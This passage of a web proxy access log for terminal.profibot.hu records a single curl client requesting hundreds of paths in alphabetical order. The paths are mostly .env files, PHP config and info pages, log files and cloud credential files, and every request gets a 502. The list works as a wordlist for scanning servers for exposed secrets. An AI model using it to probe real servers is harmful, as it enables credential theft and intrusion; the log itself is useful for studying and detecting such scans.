502 - GET https terminal.profibot.hu "/framework/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/front-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/front-empathy/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/front-end/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/front/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/front/src/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/momentum-fe/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/react/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/vue/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/web/debug/default/view" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/frontendfinaltest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/ftp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/ftpmaster/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/functions/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/gcloud.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:55 +0000] - - 502 - GET https terminal.profibot.hu "/gcp/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/gists/cache" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/gists/laravel" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/gists/pusher" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/github-connect/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/google/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/graphiql/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/graphql/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/grems-api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/grems-frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/Hash/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/hasura/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/hc/restricted" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/Helmetjs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/hgs-static/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/higlass-website/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/home/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/horde/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/hotpot-app-frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/htdocs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/html/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/http/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/httpboot/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/httpdocs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/HUNIV_migration/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/i.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/icon/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/icons/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/ikiwiki/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/image_data/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/Imagebord/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/images/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/img/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/in.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/inc.config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/includes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/includes/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:56 +0000] - - 502 - GET https terminal.profibot.hu "/index.php~" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/index1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/inf.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/info1.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/info2.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/info3.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/info4.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/infophp.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/infos.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/ini.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/install/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/InstantCV/server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/internal-api/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/internal/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/internal/config" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/isadmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/items/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/javascript/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/jenkins/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/jo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/joomla/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js-plugin/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/app.[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/app.bundle.min.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/chunk-79be581b.c4b0f5e4.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/chunk-vendors.[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/chunks/[chunk-name].[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/contact_me.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/js/vendor.[hash].js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/jsrelay/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/jupyter/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/khanlinks/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/kibana/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/kodenames-server/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/kolab-syncroton/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/Kubernetes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/kubernetes/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/l.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/lab/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:57 +0000] - - 502 - GET https terminal.profibot.hu "/lambda/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/latest/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/layout/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/lcomernbootcamp/projbackend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/leafer-app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/ledger_sync/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/legacy/tests/9.1.1" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/legacy/tests/9.2.0" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/legal/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/lemonldap-ng-doc/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/lemonldap-ng-fr-doc/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/letsencrypt/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/lib/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/lib/config.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/libraries/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/Library/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/libs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/lindex.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/linusadmin-phpinfo.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/linux/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/local.settings.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/localhost/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/locally/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/log.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/log/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/log/development.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/logging/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/login/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/login/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/logs/" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/logs/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/logs/access.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/logs/app.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/logs/error.log" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/magento/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/mailinabox/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/mailman/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/main-es2015.3c3aa123423ff18c0b00.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:58 +0000] - - 502 - GET https terminal.profibot.hu "/main-es2018.96dcf91e05121e327dcb.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main-TDTOTK7F.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main-WTCAS2AO.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.0ad61943313a734cc3ac.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.2b8841d1a101dd041285.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.35a08c25eb91de70487f.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.457ddfd2b1341056.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.48f1bbcf6201c5ea.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.58a95e8d8659972f.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.702787bb88cacd05b11d.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.b610bd7c7b9b7a47.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/main_user/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/Makefile" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/manifest.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/manual/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/master/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:23:59 +0000] - - 502 - GET https terminal.profibot.hu "/media/.env" [Client 185.177.72.56] 